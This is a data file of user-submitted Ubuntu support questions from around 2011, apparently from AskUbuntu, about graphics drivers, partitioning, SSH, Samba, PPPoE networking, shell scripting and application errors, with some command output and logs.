30064	reducing brightness of large areas containing bright colours	i do most of my work in either a terminal or a web browser . i prefer my terminals to use bright colours on dark . i would really prefer that web pages tended to look this way as well , but that 's not under my control . the problem is that when i switch from a light-on-dark terminal to a dark-on-light web page ( like this one ) , my eyes have to adjust to the overall rise in screen brightness . apparently this is bad for your eyes , in addition to being painful and annoying . it would seem to be possible for some layer of the interface to adjust the displayed colours for parts of the screen , or perhaps for particular windows , to reduce the brightness of the brighter areas of the screen . can this be done , possibly with a compiz extension ?
30067	eyefinity across 3 displays with a amd radeon 6800	so i purchased a computer recently and have been trying to customise the display . amd radeon hd 6800 series ubuntu 10.10 . i have three 22inch 1080p lcd monitors that are mounted together . everything is working smooth . how do i get the 'big-desktop ' display where i have one enormous display across all monitors ? linux - ati catalyst control center 11.2 does not give me an option to 'group ' my profiles like the pictures on their site show with windows .
30071	`` the partition is misaligned '' error in disk utility - should i repartition ?	i have a dell xps m1330 laptop that has vista installed and i just installed ubuntu 10.4 lts so i can dual boot . everything seems to be working well , but when i opened the disk utility to have a look , almost all the partitions on the hard disk are showing the warning warning : the partition is misaligned by xxx bytes with xxx being anything from 512 to 2048 to 3072 depending on which partition we are examining . example of such a warning ( picture by kendor ) : the warning is suggesting repartitioning , but i am not sure if it would be helpful . so here are my questions : is repartitioning really necessary , what tool should i use to do this , and will repartitioning the vista partition damage it ?
30072	how do i fix a `` problem with mergelist '' or `` status file could not be parsed '' error when trying to do an update ?	the computer gave me this output in a window : e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_natty_main_binary-i386_packages e : the package lists or status file could not be parsed or opened . how can i fix this ?
30073	using the onboard vga output with a pcie video card . both nvidia	i have 2 video cards , one on board , a nvidia 6150se nforce 430 and a pcie nvidia geforce gt 220 1gb ddr2 ram i have already configured the pcie card to use the dual monitor feature , using the vga and hdmi ports , but now i want to add a third monitor , using the on board vga port i have managed to enable the on board graphics processor , which is taking 400mb of ram , but i cant manage to use it , nvidia-settings does not detect it , like it 's not usable ( but is there ) my questions are the following : how can i manage to get the on board vga display to work together with the pcie graphics card ? if possible , how can i recover those 400 mb the on board card is taking ( even without being used ) or how can i get it to use the pcie card available memory ? system details : linux 2.6.35-28-generic i686 ubuntu 10.10 ( all updates installed ) nvidia driver version : 260.19.06 ( official ) if more info is needed please let me know . here is the lspci output when the on board card is disabled : 00:00.0 ram memory : nvidia corporation mcp61 memory controller ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:01.3 co-processor : nvidia corporation mcp61 smu ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb controller ( rev a3 ) 00:02.1 usb controller : nvidia corporation mcp61 usb controller ( rev a3 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6150se nforce 430 ] ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:09.0 ethernet controller : intel corporation 82557/8/9/0/1 ethernet pro 100 ( rev 08 ) 02:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 02:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) and this is when both are enabled : 00:00.0 ram memory : nvidia corporation mcp61 memory controller ( rev a1 ) 00:01.0 isa bridge : nvidia corporation mcp61 lpc bridge ( rev a2 ) 00:01.1 smbus : nvidia corporation mcp61 smbus ( rev a2 ) 00:01.2 ram memory : nvidia corporation mcp61 memory controller ( rev a2 ) 00:01.3 co-processor : nvidia corporation mcp61 smu ( rev a2 ) 00:02.0 usb controller : nvidia corporation mcp61 usb controller ( rev a3 ) 00:02.1 usb controller : nvidia corporation mcp61 usb controller ( rev a3 ) 00:04.0 pci bridge : nvidia corporation mcp61 pci bridge ( rev a1 ) 00:05.0 audio device : nvidia corporation mcp61 high definition audio ( rev a2 ) 00:06.0 ide interface : nvidia corporation mcp61 ide ( rev a2 ) 00:07.0 bridge : nvidia corporation mcp61 ethernet ( rev a2 ) 00:08.0 ide interface : nvidia corporation mcp61 sata controller ( rev a2 ) 00:09.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0b.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0c.0 pci bridge : nvidia corporation mcp61 pci express bridge ( rev a2 ) 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6150se nforce 430 ] ( rev a2 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:09.0 ethernet controller : intel corporation 82557/8/9/0/1 ethernet pro 100 ( rev 08 ) 02:00.0 vga compatible controller : nvidia corporation gt216 [ geforce gt 220 ] ( rev a2 ) 02:00.1 audio device : nvidia corporation high definition audio controller ( rev a1 ) output of lshw -class display : *-display description : vga compatible controller product : gt216 [ geforce gt 220 ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:18 memory : df000000-dfffffff memory : c0000000-cfffffff memory : da000000-dbffffff ioport : ef80 ( size=128 ) memory : def80000-deffffff *-display description : vga compatible controller product : c61 [ geforce 6150se nforce 430 ] vendor : nvidia corporation physical id : d bus info : pci @ 0000:00:0d.0 version : a2 width : 64 bits clock : 66mhz capabilities : pm msi vga_controller bus_master cap_list rom configuration : driver=nvidia latency=0 resources : irq:22 memory : dd000000-ddffffff memory : b0000000-bfffffff memory : dc000000-dcffffff memory : deb40000-deb5ffff if what i 'm looking for is not possible , please tell me , so i can disable the on board card and recover those 400mb of wasted ram thanks for your help !
30075	change the hide button for gnome-panel ?	is there a way to change the hide button on the gnome-panel ? what i mean is the buttons placed at the end of each side of the panel ? i 'm wondering if its possible , and if it is , how to go about doing it . panel hidden , button showing panel not hidden , buttons on each side
30077	`` error : no init found . try passing init=bootarg '' error after video driver update	i have dual boot windows vista and ubuntu 10.10 now i have error message as follows : no init found . try passing init=bootarg busybox v1.15.3 ( ubuntu 1:1.15.3-1ubuntu5 ) built-in shell ( ash ) i booted from live cd and ran sudo blkid and the partitions are : /dev/loop0 : type= '' squashfs '' /dev/sda1 : sec_type= '' msdos '' label= '' dellutilityè uuid= '' 07d8-020dè type= '' vfat '' /dev/sda2 : label= '' recovery '' uuid= '' 447606c27606b4a8 '' type= '' ntfs '' /dev/sda3 : label= '' os '' uuid= '' 5e5e0a7a5e0a4b6b '' type= '' ntfs '' /dev/sda5 : label= '' datagr '' uuid= '' 0c1a17a111783c '' type= '' ntfs '' sda5 is my data partition . the problems started after i tried to upgrade video drivers , then the hibernate or sleep function stopped working . i had to restart the computer . the last time i had to restart , i got the no init found error . i tried several things , including gparted and check the sda3 . but no success . is there a way to recover the booting or do i need to reformat and re-install . i did not want to loose my email profiles and email data . thanks
30080	how to solve 'connection refused ' errors in ssh connection ?	i have an ubuntu server 10.10 32-bit in my home . i 'm making ssh connections to it from my pc via putty . the problem is , sometimes i 'm able to login seamlessly . however , sometimes it gives me an error like this : network error : connection refused . then , i dont't change anything , try to login a few times more , wait a while and try again . sometimes i can log in , sometimes i can not . it seems pretty random to me . what can i do to solve this ? edit : and sometimes , putty gives network error : software caused connection abort error after displaying login as : text . here is the ping -t output : pinging 192.168.2.254 with 32 bytes of data : reply from 192.168.2.254 : bytes=32 time=6ms ttl=64 reply from 192.168.2.254 : bytes=32 time=65ms ttl=6 reply from 192.168.2.254 : bytes=32 time=88ms ttl=6 reply from 192.168.2.254 : bytes=32 time=1ms ttl=64 reply from 192.168.2.254 : bytes=32 time=3ms ttl=64 reply from 192.168.2.254 : bytes=32 time=1ms ttl=64 reply from 192.168.2.254 : bytes=32 time=1ms ttl=64 reply from 192.168.2.254 : bytes=32 time=1ms ttl=64 reply from 192.168.2.254 : bytes=32 time=1ms ttl=64 i turned off firewall of router , and everything seems to work now . except for that , i still ca n't enter my web server by typing external ip from my pc .
30081	changing from one file to another	i 'm told to go to /home/jbander/downloads , so how do i do that , i assume you do it in terminal but what do you do next , i can get to home but that is it . how do i go from one directory or file or whatever they are , to another and once i 'm there what do i do to see what is in the download file . one more question if i want to change it from e.g . cow to e.g . duck how would i do that ( they are just arbitrary names ) how do i get rid of cow and how do i put duck in it 's place .
30088	thinkpad w510 with default graphics drivers shows weird brightness issues	hey guys , i am currently running 10.10 - 32 bit on a new thinkpad w510 with nvidia quadro fx 880m graphics card . i am running with the default graphics drivers that installed with ubuntu install . my problem is that when i am logging in the screen acts normally as far as birghtness is concerned . i can increase/decrease brightness with fn keys . but few seconds after i log in screen goes pitch dark . hitting fn+home flickers the screen to all the way bright , then all the way dark . this behavior continues until i reach maximum brightness , in which case the screen stays all the way bright , for a few more seconds and then again goes dark if there is no activity & the cycle continues . have you guys faced any of these issues ? if so any pointers on how to resolve it . i am not alone , on ubuntu forum i saw another person having the same issue - link but no solution . please help ! update i followed the instructions that htorque mentions in his answer and it worked . update 2 after a while the issues cropped again . this time i bit the bullet and installed the nvidia 's official graphics drivers ( via system > admnistration > additional drivers ) and the issue seems to have gone . the ui seems more snappier as well .
30093	touchpad stops working after desktop shows up	i have problem with touch-pad . it is not working correctly . it goes like this . when laptop is booting , right after desktop shows , i can move mouse with touch-pad for a second , but when icons shows up , touch-pad does not want to move cursor at all . even buttons stops work . the same problem with ubuntu 10.04 and ubuntu 10.10 i can see `` touchpad '' tab in `` mouse '' menu , and i can even set `` two finger scrolling '' . i checked in gconf-editor under `` desktop- > gnome- > pheriferals- > touchpad '' and it 's enabled . furthermore i checked xinput and it is as it should be : synps/2 synaptics touchpad id=11 [ slave pointer ( 2 ) ] . i tried to create new master reattach but still nothing ... edit : laptop has fn + f7 to control touch-pad . ubuntu shows bobble showing touchpad off and touchpad on . but it does nothing . no matter if it say on , it still does not work .
30096	can unity places be written in c++ ?	is c++ a supported language for writing unity places ?
30102	alias with parameters	i was recently starting to setup my usual alias . i ended up needing to pass more information than my alias originally needed $ alias runserver = 'python manage.py runserver' $ runserver 80 // turns out you need sudo $ sudo runserver 80 $ sudo : runserver : command not found now as i was writing this i realized maybe the alias is n't set for root . could that be it ? if not , could someone explain why this does n't work . please and thank you
30104	samba issue with sharing directories on ntfs/fat32	i have some strange problems with samba server . i am using samba version 3.5.4 on ubuntu 10.10 . i have two windows xp machines , one on virtualbox on ubuntu and another office laptop . windows machine on virtualbox has no issues in accessing the shared folders , but the laptop is not able to access all the shared content . the issue faced on laptop is the following . shared folders on ext3 drives have no issues in accessing , but the contents shared on ntfs and fat32 drives ( mounted ones ) are not accessible . when i try to open the shared folder , it asks for user name and password , but does n't accept when i provide it . ( even if i provide admin login details ) . i changed workgroup value to the domain_name in office laptop , but still the problem persists . here is the smdb.conf i am using : [ global ] workgroup = xxx.xxx.org server string = % h server ( samba , ubuntu ) map to guest = bad user obey pam restrictions = yes pam password change = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . unix password sync = yes syslog = 0 log file = /var/log/samba/log. % m max log size = 1000 dns proxy = no usershare allow guests = yes panic action = /usr/share/samba/panic-action % d guest ok = yes [ homes ] comment = home directories [ printers ] comment = all printers path = /var/spool/samba read only = no create mask = 0700 printable = yes browseable = no [ print $ ] comment = samba server 's cd-rom path = /cdrom force user = nobody force group = nobody locking = no workgroup was defined as `` homenet '' before , changed it to domain name on the office laptop thinking it was the problem , but for no avail .
30105	how do i make the 'shut down the computer ' window be monochrome ?	when i hit the power button of my computer , a window titled 'shut down the computer ' appears . it gives a few options , including shutting down or restarting . this window is different following the context i hit the power button : when logged in and seeing my desktop , it includes colourful icons ( red for shutting down , for example ) . when i am not logged in yet , the icons are monochrome and a little bit more stylized . i clearly prefer the last type of icons : how do i set them as default whatever the context of use of the 'shut down the computer ' window ?
30109	how to control xfx hd 5770 fan speed ?	hey , how would i go about controlling my graphics card 's fan speed ( xfx hd 5770 ) ? for some reason it keeps spinning up and it 's really loud . i currently dual boot with windows 7 x64 and it works fine on that and remains at a steady speed . i have tried using lm-sensors but i ca n't seem to get it to work .
30114	force the user to change their password at first login	when i add a new user to my system i set a password and tell it to the new user . if the user does n't like it , he/she can change it . however in my opinion it is better to force the user to change his/her password at the first login . is there a way i can do that in ubuntu ?
30115	root can not access /dev/urandom	i am trying to generate a gpg key , and i can not generate enough entropy . so i installed rng-tools and tried following these instructions : http : //serverfault.com/questions/214605/gpg-not-enough-entropy when i am logged in as root , and try to run rngd -r /dev/urandom i get the following error : ca n't open /dev/random : permission denied i find this disturbing as i am root . this is ubuntu on a virtual server ( via parallels i believe . )
30117	organizing the disk and folder structure for an upgrade	i 'm using ubuntu as a lamp server . i 'd like to arrange the disk partition and folder structure for an easy upgrade to the next ubuntu version . in windows it can be : a : windows b : program files c : data . how should this be done in ubuntu ? thanks .
30123	wacom bamboo cth460l issues	i recently bought a wacom bamboo pen & touch cth460l . i installed doctormo 's ppa , however , the pen functionality did n't work and the touch was very glitchy ( when i touched it , it immediately double clicked and began to drag elements in the screen ) . i tried to configure it using the wacom-utility package in the synaptic package manager ( version 1.21-1 ) but that did n't work either . then i followed this post ( # 621 , written by aaaalex ) , and after some problems trying to restart ubuntu ( graphics related problems ) , the pen works fine ( it could be better , though ) but the touch functionality does n't work anymore . currently i have installed xserver-xorg-input-wacom ( 1:0.10.11-0ubuntu7 ) , wacom-dkms ( 0.8.10.2-1ubuntu1 ) and wacom-utility . the wacom utility only displays an `` options '' field under `` wacom bamboopt 2fg 4x5 '' but no other option to configure it . what is the correct way to get this tablet working on ubuntu 10.04 ? . by the way , currently i ca n't start ubuntu properly when the tablet is connected ( in that case , ubuntu start in low graphics mode ) . i need to connect it later . update : i uninstalled xserver -xorg-input-wacom , and wacom-utility because one of them prevented ubuntu to start normally . i only re-installed wacom-dkms 0.8.10.2-1ubuntu1 . the pen is working but no touch functionality . the side buttons do n't work either . thanks in advance .
30124	problems with titlebar in 11.04 , unity	after launching openoffice , the titlebar is not shown correctly . the symbols and the name of the program are missing .
30126	will unity work with a video card without 3d support ?	i am currently running ubuntu 10.10 . the unity netbook interface seems to fail on my laptop because it has an unsupported video card ( one of the radeon ones ) . will i have a problem with i upgrade to 11.04 where unity is default ? can i just switch it back to a different interface ( the one that is currently default on 10.04 ) ?
30128	my thinkpad x201 battery is draining extra fast . what can i do ?	i got a new thinkpad x201 last week with the 6 cell battery , which is advertised to work for 5 hours . i installed ubuntu maverick on this machine right away . my battery life is only around 2 hours . is this because the thinkpad 's battery power management only works well under windows ? or can i change some configuration to make my battery last longer under ubuntu ?
30129	where i can i find zentyal ?	i 'm using ubuntu 10.10 maverick . does anyone know where i can find a version of zentyal for it ? i heard that webmin is not available any more , and i had a problem with it , so i 'm trying to change the webmin to zentyal . the problem now is that i can only find the version for ubuntu 10.04 ( lucid ) . i 'm having a problem with connection speed , which is why i need zentyal to help me configure squid to cache the webpage for faster loading .
30130	remove /boot partition	sometimes i wanted to do smart partitions , by doing separate /boot partition , but i only give little space . now i am having problems with lack of space on that partition . how to remove /boot partition and join it with /root partition ?
30135	gnome mplayer failed to open vdpau backend libvdpau_nvidia.so	when i open an avi file under gnome mplayer , there is an error report : failed to open vdpau backend libvdpau_nvidia.so : can not open shared object file : no such file or directory i then followed this blog to solve this problem , which suggests two ways . the first way is to call mplayer in terminal : mplayer -vo xv video.wmv this works for me . but i would like to try the second way , which is to call gui version of gnome mplayer by writing some options in one of the configure files of gnome mplayer . i choose to write into ~/.mplayer/config , where i wrote : -vo xv but it does not work . so i was wondering if i make any mistake ? what to write into the configure file ? thanks and regards ! added : i followed fragos 's reply , by replacing the original command `` gnome-mplayer % u `` with `` gnome-mplayer -vo xv % u `` in its item in the applications menu . but this fails to call the gnome mplayer . any idea why ? thanks !
30140	netatalk 100x slower than scp with usb disk	i have netatalk install on a headless ubuntu box on my lan . i have a usb drive mounted on /mnt/ext . when attempting to copy a ~700 mb file from the box using netatalk ( afp ) or samba , my estimated time is ~3.5 hours . when using scp to copy the same files i complete the transfer in 5 minutes . anyone have a clue what is going on ?
30143	can not read from 2nd sata data drive connected via sata docking station	installed 10.10 this week on dual boot system . everything else works fine but can not read from 2nd sata drive with all my data . same drive works normally when booted to windows xp . interesting part is that i can see the drive in ubuntu disk manager , can read all its attributes , can test it , shows up in disk manager , storage device manager and mount manager , and can mount it , even change attributes ; it appears healthy but does not show up in `` computer '' or anywhere else that it can be accessed . the drive is connected via an external e-sata docking station which is connected to a sata port on the motherboard . screen captures : http : //www.smallwood.com.au/ubuntu/ ( fyi disk that ca n't be accessed is sdc5 ) rob @ rob-ga-vm900m : ~ $ mount /dev/sda6 on / type ext4 ( rw ) none on /proc type proc ( rw , noexec , nosuid , nodev ) none on /sys type sysfs ( rw , noexec , nosuid , nodev ) fusectl on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /dev type devtmpfs ( rw , mode=0755 ) none on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) none on /dev/shm type tmpfs ( rw , nosuid , nodev ) none on /var/run type tmpfs ( rw , nosuid , mode=0755 ) none on /var/lock type tmpfs ( rw , noexec , nosuid , nodev ) /dev/sda1 on /media/142c6bdd2c6bb87e type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) /dev/sdb1 on /media/sdb1 type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfs-fuse-daemon on /home/rob/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=rob ) rob @ rob-ga-vm900m : ~ $ ^c rob @ rob-ga-vm900m : ~ $
30145	ppa & packaging : having versions of packages for multiple distros	( quote from chat ) got a ppa on launchpad for source packages for an irc bot project i 'm associated with ( since its all the intermediate packaging for the stuff between releases , it 's classified as an `` experimental '' ppa ) . question : i 've already packaged the stuff for a lucid build . any clue how i 'd be able to create the same packaging , except package it for maverick , and put it up to the same ppa that i 've put the lucid packaging to ?
30147	command to determine whether a fullscreen application is running ?	i have a small shell script that plays a little jingle and displays a notification whenever i get a new email . the problem is that this shell script can get invoked anytime - including when i 'm watching a dvd / video in fullscreen mode with the sound turned up quite a bit - which is quite annoying . i 'd like to enhance this script with the ability to detect whether an application is in fullscreen mode . i know this must be somehow possible because notifications do n't display under those circumstances . what command can i use ?
30148	how can i determine whether a shellscript runs as root or not ?	this is something i 've been curious about . i make a lot of small bash scripts ( .sh files ) to do tasks that i routinely do . some of those tasks require everything to be ran as superuser . i 've been curious : is it possible to , within the bash script prior to everything being run , check if the script is being run as superuser , and if not , print a message saying you must be superuser to use this script , then subsequently terminate the script itself . the other side of that is i 'd like to have the script run when the user is superuser , and not generate the error . any ideas on coding ( if statements , etc . ) on how to execute the aforementioned ?
30154	copy directory to external hdd	i 'm trying to copy a directory to external hdd- i mounted the device and then typed : cd root tar -cf - * | ( cd /mnt ; tar -xpf - ) i got this error message : '' cowardly refusing to create an empty archive '' when i do ls to the same root directory- it is not empty at all- there are all my needed files . why does it happen ? ?
30159	font style changed suddenly - what 's wrong ?	/* to see the screenshots clearly please hit 'ctrl ' and '+ ' */ after installing kubuntu 10.10 the look and feel was awesome . the fonts looked beautiful . but after having a reboot the font style changed and looked very ugly . after that i gave it another install . the fonts looked beautiful again . but after installing a gnome program ( synaptic packagemanager ) the font style changed again . i have taken some screenshots system settings - > font before and after the font style chaged but there were no change in the settings . this is immediately after installing kubuntu . the fonts look very healthy here after installing a gnome application or a reboot fonts got very thin and ugly . just compare the line in konsole , words in menu . there is no change in the system settings . also compare the letters of system settings page . same settings . but different style ! ! what 's wrong ? how can i bring back the font style that was immediately after installation ?
30163	how to install the most common plugins ?	how can i install the most used plugins like flash player and mp3 in ubuntu ?
30167	is it possible to make clipboard work always the same ?	iirc , once upon i time i used only the mouse for copy-and-paste , which i consider way superior to the windows-like ctrl-c ctrl-v complication . now after many years i 'm slowly starting to use linux again and to my horror i see that it does n't work anymore , except between emacs and terminal windows . of course , the keyboard shortcuts do n't work in emacs , so it 's a real pain e.g . to copy from emacs to firefox . is there a way how to fix it ? i mean i want to use marking and pasting using the mouse only everywhere , not the other way round . i 'm not asking about clipboard managers , i need neither clipboard persistence nor multiple clipboards , but if it solves my problem , i 'll go for it .
30172	how to connect ethernet via a huawei smart axmt880s modem ( with auto-detection ) ?	it 's been well over six months but i have the same router smartax mt880d with ethernet , and the exact same problem : no internet , even though i can successfully reach the modem settings page by entering 192.168.1.1 in firefox . i 'm a total beginner with ubuntu . my internet works great in windows but does not work in ubuntu . sorry if i do n't use the right ( technical ) terminology to explain my issue . english is not my mother tongue . for 2 weeks , i 've been doing reading on the web and forums and the ubuntuguide.org to name a few , but to no avail . now i see no other solution but to ask for help . my problem is that i ca n't find a way to put the right digits in the right place because i do n't know what numbers i need to put in what files . e.g . : do i need to use dhcp ? or a static ip address ? no clue whatsoever . i 'm concerned that i might put figures in the wrong spaces . for example , is the modem/router 's ip exactly 192.168.1.1 for huawei smart axmt880d modem ? is the subnet 255.255.255.0 ? gateway 192.168.1.1 ? i 'm confused as i can also see a different ip starting with 155131*** ( is it an account number ? ) on my contract with huawei ( a chinese isp ) . apart from calling 911 , what other numbers do i need to put in and where ? how do i check that all the numbers have been entered correctly in every appropriate space before trying to connect the internet ? further development of the issue : first as per the post below , i successfully disabled ipv6 from article called `` simple way to disable ipv6 in windows vista '' . then i tried connecting to the internet in ubuntu , to no avail again . then i checked my settings in ubuntu . i typed /etc/network/interfaces . there appears the loopback setting only , i.e . auto lo iface lo inet loopback i also checked /etc/resolv.conf but it 's empty . at this stage , the network manager still does not detect anything even after having disabled ipv6 . then i tried scaine 's suggestion about pppoeconf coming from an article translated from chinese . so i did the steps below and rebooted as the restart option ( last step of the procedure below ) has frozen for 2 minutes before i decided to reboot ... ( is that supposed to freeze at this stage ? ? ) : basically , from the article ( i have obviously not tested this ! ) : sudo apt-get install pppoeconf to start the adsl connection when needed , in a terminal , sudo pon dsl-provider to disconnect the adsl connection , you can enter in a terminal , sudo poff if you need to check the log , you can enter in a terminal plog . access to interface information in a terminal type ifconfig ppp0 after using the pppoeconf if network manager does not display hosted solution : enter the following command in a terminal to configure a network connection : sudo gedit /etc/networkmanager/nm-system-settings.conf and change [ ifupdown ] managed = false to [ ifupdown ] managed = true then in terminal run sudo gedit /etc/network/interfaces and keep only : auto lo iface lo inet loopback delete dns settings sudo mv /etc/resolv.conf /etc/resolv.conf_backup finally restart network-manager : sudo service network-manager restart after that , the settings remained the same . that is , in /etc/network/interfaces , still the loopback settings , and /etc/resolv.conf is still empty . then , i tried simon bridge 's advice about pppoeconf ( in post # 8 ) i tried that pppoeconf before registering on askubuntu.com and after reading and trying everything in this thread ( until 16th march 2011 ) . my view on the topic is that by having tested many things different tips one after the other , i may have mixed settings in the end . to sum up now : ipv6 is disabled . in addition , in ipconfig /all in windows , i now noticed that dhcp is on for the wireless lan adapter wireless network connection , and ethernet adapter local area connection just shows the description of it : via velocityfamily gigabit ethernet adapter . that 's it . the ethernet is not `` on '' anymore . what should i do now ? ? ? setting the ip address maybe ? ? ? as a result , dhcp is on in windows ( for the wireless ) but still does not auto-detect anything yet ( same thing for dhcp as a matter of fact . for the wireless , no detection although i can see the different wireless networks ) pppoeconf does not detect anything either after having done everything below . therefore , i think there 's a setting which has not been set correctly somewhere but where ? that remains a question ... thx anyway to you all . if you have any suggestion ... i 'm grateful to you anyway . edit : hi scaine , here are some interesting results from pppoeconf ! i think i 'm about to succeed ... .but one more barrier below . could you please help guide me again ? what do i have to do to turn on that internet connection ? when i enter sudo pon dsl-provider , nothing ( i can see ) happens ... joel @ ubuntu : ~ $ sudo pppoeconf [ sudo ] password for joel : plugin rp-pppoe.so loaded . rp-pppoe plugin version 3.8p compiled against pppd 2.4.5 joel @ ubuntu : ~ $ plog mar 16 21:08:14 ubuntu pppd [ 1840 ] : remote message : authentication success , welcome ! mar 16 21:08:14 ubuntu pppd [ 1840 ] : pap authentication succeeded mar 16 21:08:14 ubuntu pppd [ 1840 ] : peer from calling number 00:25:9e : f1 : c1:9c authorized mar 16 21:08:14 ubuntu pppd [ 1840 ] : can not determine ethernet address for proxy arp mar 16 21:08:14 ubuntu pppd [ 1840 ] : local ip address 27.190.153.195 mar 16 21:08:14 ubuntu pppd [ 1840 ] : remote ip address 27.190.152.1 mar 16 21:08:14 ubuntu pppd [ 1840 ] : primary dns address 222.222.202.202 mar 16 21:08:14 ubuntu pppd [ 1840 ] : secondary dns address 222.222.222.222 joel @ ubuntu : ~ $ pon dsl-provider error : only members of the 'dip ' group can use this command . joel @ ubuntu : ~ $ sudo pon dsl-provider plugin rp-pppoe.so loaded . rp-pppoe plugin version 3.8p compiled against pppd 2.4.5
30180	menubar hidden in all kde apps	i am using kubuntu 10.10 with plasma-netbook on my netbook . somehow i messed up with window 's settings and now the menubar ( the one on top of the window , just below the titlebar , which has the file button , edit , settings , help , ... ) is hidden from all my kde applications . here you can see how the menubar should be correctly displayed : here you can see how it is actually displayed on my netbook : i do n't remember what i did to hide the menubar , i clicked somewhere in the context menu which shows right-clicking on window title , but i can not find that setting anymore . can you please help me ?
30181	how to execute a script as super user first checking the user and getting pass from askpass if not super user	thers a similar question out there how can i determine whether a shell-script runs as root or not ? i have the same doubt with different result is it possible to , within the bash script prior to everything being run , check if the script is being run as superuser , and if not , print a message saying you must be superuser to use this script , then subsequently get pass from the user using askpass or something like that then execute the same script as superuser ?
30183	chromium 12 still showing older icon	i just upgraded to chromium 12 using daily build ppa . but chromium is still showing older icon on the gnome panel and appication menu . but it shows new icon if i create shortcut on the desktop and it shows new icon about window of chromium . i tried to remove it completely and re-installed but no use . i even deleted the .cache folder from my home directory .
30185	banshee encountered a fatal error ( sqlite error 11 : database disk image is malformed )	i am running ubuntu 10.10 maverick meerkat , and recently i am helping in testing out indicator-weather using the unstable buids . however there was a bug which caused my system to freeze suddenly ( due to indicator-weather not ubuntu ) and the only way to recover is to do a hard reset of the system . this happened a couple of times . and when i tried to open banshee after a couple of such resets i get the following fatal error which forces me to quit banshee . the screenshot is not clear enough to read the error , so i am posting it below , an unhandled exception was thrown : sqlite error 11 : database disk image is malformed ( sql : begin transaction ; delete from coresmartplaylistentries where smartplaylistid in ( select smartplaylistid from coresmartplaylists where istemporary = 1 ) ; delete from coresmartplaylists where istemporary = 1 ; commit transaction ) at hyena.data.sqlite.connection.checkerror ( int32 errorcode , system.string sql ) [ 0x00000 ] in < filename unknown > :0 at hyena.data.sqlite.connection.execute ( system.string sql ) [ 0x00000 ] in < filename unknown > :0 at hyena.data.sqlite.hyenasqlitecommand.execute ( hyena.data.sqlite.hyenasqliteconnection hconnection , hyena.data.sqlite.connection connection ) [ 0x00000 ] in < filename unknown > :0 exception has been thrown by the target of an invocation . at system.reflection.monocmethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.monocmethod.invoke ( bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.constructorinfo.invoke ( system.object [ ] parameters ) [ 0x00000 ] in < filename unknown > :0 at system.activator.createinstance ( system.type type , boolean nonpublic ) [ 0x00000 ] in < filename unknown > :0 at system.activator.createinstance ( system.type type ) [ 0x00000 ] in < filename unknown > :0 at banshee.gui.gtkbaseclient.startup ( ) [ 0x00000 ] in < filename unknown > :0 at hyena.gui.cleanroomstartup.startup ( hyena.gui.startupinvocationhandler startup ) [ 0x00000 ] in < filename unknown > :0 .net version : 2.0.50727.1433 os version : unix 2.6.35.27 assembly version information : gkeyfile-sharp ( 1.0.0.0 ) banshee.audiocd ( 1.9.0.0 ) banshee.minimode ( 1.9.0.0 ) banshee.coverart ( 1.9.0.0 ) indicate-sharp ( 0.4.1.0 ) notify-sharp ( 0.4.0.0 ) banshee.soundmenu ( 1.9.0.0 ) banshee.mpris ( 1.9.0.0 ) migo ( 1.9.0.0 ) banshee.podcasting ( 1.9.0.0 ) banshee.dap ( 1.9.0.0 ) banshee.librarywatcher ( 1.9.0.0 ) banshee.multimediakeys ( 1.9.0.0 ) 